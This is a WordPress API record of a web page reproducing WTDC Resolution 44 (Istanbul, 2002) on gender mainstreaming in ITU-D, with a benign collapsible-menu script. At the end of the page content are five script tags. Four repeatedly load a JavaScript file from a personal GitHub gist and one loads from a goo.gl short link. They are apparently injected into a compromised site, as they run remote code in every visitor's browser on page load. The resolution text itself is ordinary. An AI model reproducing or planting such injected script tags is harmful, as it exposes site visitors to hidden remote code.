{"id":698,"date":"2013-06-18T22:01:34","date_gmt":"2013-06-19T02:01:34","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=698"},"modified":"2015-06-30T00:08:37","modified_gmt":"2015-06-30T04:08:37","slug":"wtdc_44","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/wtdc\/wtdc-2010\/wtdc_44\/","title":{"rendered":"WTDC Resolution 44"},"content":{"rendered":"<p><style type=\"text\/css\">\r\nbody {}\r\n\r\n:link { color: #0000ff; text-decoration:none;}\r\n:visited { color: #6666ff; text-decoration:none; }\r\na:active { color: #0000ff; text-decoration:none;}\r\na:hover {color: #0000ff; text-decoration:underline; }\r\n\r\ndiv.basetext {}\r\n\r\ndiv.basetop {}\r\n\r\nh1 {\r\n    text-align:center;\r\n}\r\n\r\nspan.h2 {}\r\n\r\ndiv.year {}\r\n\r\ndiv.form {}\r\n\r\nspan.cpt {}\r\n\r\nspan.cm {}\r\n\r\n.fl {}\r\n\r\nul {}\r\n\r\nli {}\r\n\r\nul li {}\r\n\r\nli.basic {}\r\n\r\nspan.links {}\r\n\r\n\r\n\r\n\r\n.sub { display: none; }\r\n.subexp {display: block; }\r\n.sub { display: none; } \r\n\r\n.subexp {display: block; } \r\n\r\nli.exp {\r\n  cursor:pointer;\r\n}\r\n\r\nli.col {\r\n  cursor:pointer;\r\n}\r\n\r\nli.exp_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\nli.col_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\n\r\nli.basic_active {\r\n  background-color:#eeeeff;\r\n}\r\n<\/style><br \/>\n<SCRIPT language=JavaScript>\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u00e4vi\u00e4 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/SCRIPT><\/p>\n<h3><span style=\"\">WTDC RESOLUTION 44 (Istanbul, 2002)<\/span><\/h3>\n<h4><span style=\"\">Mainstreaming gender in ITU-D programmes<\/span><\/h4>\n<p><span style=\"\">The World Telecommunication Development Conference (Istanbul, 2002),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\" style=\"\"><span style=\"\">noting<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a) Resolution 7 of the World Telecommunication Development Conference (Valletta, 1998), which resolves &#8220;to establish a task force on gender issues to facilitate, develop and take forward a range of activities aimed at ensuring that the benefits of telecommunications and the emerging information society are made available to all women and men in developing countries on a fair and equitable basis&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b) Resolution 70 (Minneapolis, 1998) of the Plenipotentiary Conference, on the inclusion of gender perspective in the work of ITU, which instructs the Council &#8220;to ensure that, within available resources, appropriate funding is included in each budget for gender perspective initiatives&#8221;; instructs the Secretary- General &#8220;to facilitate the work of the ITU Focal Point on Gender Issues by providing the necessary means to carry out the work&#8221;; and instructs the Secretary-General and Directors of the Bureaux &#8220;to report to Council each year on progress made&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c) the Memorandum of Understanding between ITU, UNDP and UNIFEM, signed in July 2000, which promotes cooperation to enable women to participate in, and benefit from, the current communications revolution,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">further noting<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a) Beijing+5 Outcome Document, Section J, 100(b), which recommends &#8220;to develop programmes that support women&#8217;s ability to create, access and promote networking, in particular through the use of new information and communications technology&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b) the G8 DOT Force Report, May 2001, Action Point 3 (d) which gives &#8220;special attention to disenfranchised and illiterate people (particularly youth and women), through innovative partnerships to disseminate knowledge and skills using ICT&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c) ITU Council Resolution 1187 (2001 session), on Gender Perspective in ITU Human Resource Management, Policy and Practice which requests the Secretary-General &#8220;to allocate appropriate resources, within existing budgetary limits, to establish a gender perspective full-time dedicated staff&#8221;;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d) ECOSOC Resolution E\/2001\/L.29 (July 2001) on Social and human rights questions: advancement of women, which decides &#8220;to establish, under the regular agenda item &#8220;Coordination, programme and other questions&#8221;, the regular sub-item &#8220;Mainstreaming a gender perspective into all policies and programmes of the United Nations system&#8221; in order to, inter alia , monitor and evaluate achievements made and obstacles encountered by the United Nations system, and to consider further measures to strengthen the implementation and monitoring of gender mainstreaming within the United Nations system&#8221;,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">recognizing<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a) the powerful forces of globalization and the spread of information communication technology;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b) that information technology has become a potent force in transforming social, economic, and political life globally;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c) that if the ultimate goal is to provide universal access to telecommunication services, it would be counterproductive to neglect the gender dimension in telecommunications;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d) the far-reaching implications of the impact of telecommunications and especially information and communication technologies (ICT) on women;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e) that the United Nations places lack of access to information technology as the third most important issue facing women globally, after poverty and violence against women,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a) the progress made by ITU, particularly in ITU-D, in awareness raising of gender issues over the last four years, ITU&#8217;s increasing participation in international forums as well as studies, projects and training initiated by the Task Force on Gender Issues (TFGI);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b) the catalytic role of the ITU Focal Point on Gender Issues and the Secretary to the TFGI to carry forward the work on gender issues in addition to their regular ITU duties, and the lack of continuous support staff to assist in carrying out those duties;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c) the financial support committed by Norway to contribute to ITU-D&#8217;s effort to promote gender issues by establishing a gender unit in ITU, and that this contribution will cover the first two years of gender expertise,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">resolves<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">that ITU-D should include gender initiatives in each of the programmes established under the Istanbul Action Plan to ensure that the following priority areas are fully integrated and included into the programmes as well as in the operational plan over the next four-year cycle period:<\/span><\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">Within ITU-D<\/span>\n<ul class=\"sub\">\n<li class=\"exp\" style=\"\"><span style=\"\">a) Mainstream a gender perspective* into BDT strategic, operational and budgetary plans<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">* &#8220;Gender perspective&#8221;: Mainstreaming a gender perspective is the process of assessing the implications for women and men of a ny planned action, including legislation, policies, or programmes in all areas and at all levels. It is a strategy for making women&#8217;s as well as m en&#8217;s concerns and experiences an integral dimension of design, implementation, monitoring and evaluation so that women and men benefit equally and inequality is not perpetuated. The ultimate goal is to achieve gender equality. (Source: Report of the Inter-Agency Committee on Women and Gender Equality, third session, New York, 25- 27 February 1998).<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b) Monitor and evaluate projects and programmes to assess gender implications<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c) Incorporate gender indicators in ITU statistics<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d) Develop training modules in line with TFGI &#8220;Curriculum Proposal on Integration of Gender Perspectives in Telecommunication Policy&#8221;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e) Provide gender mainstreaming capacity training in BDT, specifically to staff responsible for development projects and activities<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f) Incorporate a gender perspective into study group Questions where appropriate and carry out an annual assessment of gender impact on those Questions<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g) Promote new partnerships and mobilize resources for gender projects and ICT-related activities with gender components<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">Assistance to Member States<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a) Encourage the mainstreaming of a gender perspective through appropriate administrative mechanisms and processes within regulatory agencies, ministries and promote inter-organizational cooperation and gender related initiatives in the telecommunication sector<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b) Provide advice on gender analysis, gender statistics and gender perspective in policy and regulatory issues to ITU membership, including advice on monitoring and evaluation methods and guidelines for projects and activities<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c) Promote access to rural ICT facilities such as telecentres operated and managed by women<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d) Provide support in organizing capacity-building ICT workshops, especially for underserved communities<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e) To encourage their Sector Members to contribute to the equality of men and women in the ICT sphere,<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">further resolves<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">that ITU-D convert the TFGI into a working group on gender issues working consistent with the mandate in WTDC-98 Resolution 7 as well as on any new and relevant issues, with allocated resources (see Terms of reference, Annex 1),<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites the Plenipotentiary Conference<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to take this resolution into account while revising its Resolution 70 (Minneapolis, 1998) and in considering the Strategic Plan of the Union, to ensure that through the establishment of an ITU gender unit with full-time professional gender expertise, gender mainstreaming for ITU as a whole is continued and sustained (Terms of Reference, Annex 2),<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">urges Member States<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">in submitting contributions to the Plenipotentiary Conference, to take into account the need for full-time gender expertise for mainstreaming the gender perspective into the ITU activities as a whole.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">ANNEX 1 TO RESOLUTION 44 (Istanbul, 2002)<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">Terms of reference of the Working Group on Gender Issues<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">1) The Working Group on Gender Issues will comprise BDT representatives, appointed by the Director of BDT, as well as representatives of Member States, Sector Members, United Nations bodies, other regional\/international organizations, non-governmental organizations (NGOs) and individual experts. The Working Group will be an &#8220;open&#8221; group, welcoming all persons and organizations with relevant expertise to join and participate in its work.<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2) The Working Group shall be responsible to and report to the Director of BDT.<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3) Members of the Working Group shall participate in all ITU-D activities to ensure that a gender perspective is included in its policies and work programmes, including human resources development activities, study groups, seminars, conferences and workshops.<\/span><\/li>\n<li class=\"col\" style=\"\"><span style=\"\">4) The Working Group will be responsible for:<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\" style=\"\"><span style=\"\">a) securing financial and other resources to carry out this work, including through partnerships with the private sector, multilateral development finance bodies and other donors;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b) defining its specific tasks, working methods and priorities.<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5) The scope of work of the Working Group will include, but not be limited to, priority programmes of ITU-D (i.e. sector reform, regulation and legislation, rural development and universal access, technologies and applications, finance and economics, partnerships with the private sector, human resources development and management) and other projects such as broadcasting, development of telecentres, telemedicine, tele-education, telecommunications and trade, telecommunications as a social service, telecommunications and the environment, and telecommunications and disaster preparedness, and the universal right to communicate campaign.<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6) The Working Group will serve as a source of expert advice, guidance and assistance to ITU-D in developing its policies, work programmes and projects in telecommunications. It will also keep ITU- D up to date with of progress made on gender issues by the United Nations system and Member States, and provide training for BDT staff on gender issues, as appropriate.<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">7) The Working Group will undertake a comprehensive range of activities to increase participation of women in policy and decision-making, operation and regulation of the telecommunication sector.<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">8) The Working Group shall assist ITU-D in raising awareness and disseminating information in order to sensitize all stakeholders in the telecommunication industry to the importance of these issues by working closely with existing women&#8217;s communications networks, the Youth Network, the Platform for Communications and Democratization, and with specialist gender and development networks within the United Nations system, including those provided by UNIFEM and UNU-INTECH.<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">ANNEX 2 TO RESOLUTION 44 (Istanbul, 2002)<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">Terms of reference for an ITU gender unit<\/span><\/li>\n<li class=\"col\" style=\"\"><span style=\"\">An ITU gender unit with full-time professional gender expertise would, inter alia :<\/span>\n<ul class=\"subexp\">\n<li class=\"basic\" style=\"\"><span style=\"\">1) ensure that continued efforts are made to mainstream gender into ITU&#8217;s strategic, operational and budgetary plans;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2) facilitate the inclusion of a gender perspective into the analytical and statistical work of ITU;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3) provide advice on mainstreaming a gender perspective in policy and regulatory matters for ITU, Member States and Sector Members;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4) advise and assist staff in applying a gender perspective in their activities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5) collect and disseminate information related to gender issues and best practices;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6) monitor and evaluate projects and programmes to assess their gender implications;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">7) provide advice to the Secretary-General and the Directors of the Bureaux of the three Sectors on the role that ITU should take in order to be a leader in gender and ICT-related issues as part of the many international initiatives to bridge the digital divide, such as the G8 Dot Force, the United Nations ICT Task Force and the World Summit on the Information Society.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/goo.gl\/dd1kPI'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WTDC RESOLUTION 44 (Istanbul, 2002) Mainstreaming gender in ITU-D programmes The World Telecommunication Development Conference (Istanbul, 2002), noting a) Resolution 7 of the World Telecommunication Development Conference (Valletta, 1998), which resolves &#8220;to establish a task force on gender issues to facilitate, develop and take forward a range of activities aimed at ensuring that the benefits [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1486,"menu_order":44,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-698","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/698","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=698"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/698\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1486"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=698"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}